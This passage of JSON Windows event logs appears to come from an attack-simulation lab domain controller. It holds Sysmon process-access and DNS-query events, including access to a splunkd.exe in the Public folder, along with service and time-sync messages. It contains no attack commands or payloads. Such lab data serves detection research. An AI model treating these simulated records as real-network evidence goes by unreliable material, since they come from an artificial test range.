M32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2400,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2401,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2402,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2403,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.630\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1079-5F25-0000-00107A420400}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.630","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1079-5F25-0000-00107A420400}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2404,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.833\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:29.833","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2405,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.286\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nQueryName: wpad\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.286","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","QueryName":"wpad","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2406,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.606\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001072BF0200}\r\nProcessId: 2460\r\nQueryName: win-dc-8400769\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.606","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001072BF0200}","QueryName":"win-dc-8400769","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","EventReceivedTime":"2020-08-01 06:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2407,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:30.848\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:30.848","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76830,"ProcessID":852,"ThreadID":2920,"Channel":"System","Message":"The NetSetupSvc service entered the stopped state.","param1":"NetSetupSvc","param2":"stopped","EventReceivedTime":"2020-08-01 06:49:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":12,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76831,"ProcessID":1196,"ThreadID":2644,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the AD PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the AD PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.","Opcode":"Info","EventReceivedTime":"2020-08-01 06:49:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":134,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76832,"ProcessID":1196,"ThreadID":1384,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"NtpClient was unable to set a manual peer to use as a time source because of DNS resolution error on 'time.windows.com,0x8'. NtpClient will try again in 15 minutes and double the reattempt interval thereafter. The error was: No such host is known. (0x80072AF9)","Opcode":"Info","ErrorMessage":"No such host is known. (0x80072AF9)","RetryMinutes":"15","DomainPeer":"time.windows.com,0x8","EventReceivedTime":"2020-08-01 06:49:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76833,"ProcessID":852,"ThreadID":2920,"Channel":"System","Message":"The W32Time service entered the running state.","param1":"W32Time","param2":"running","EventReceivedTime":"2020-08-01 06:49:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2408,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:31.864\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 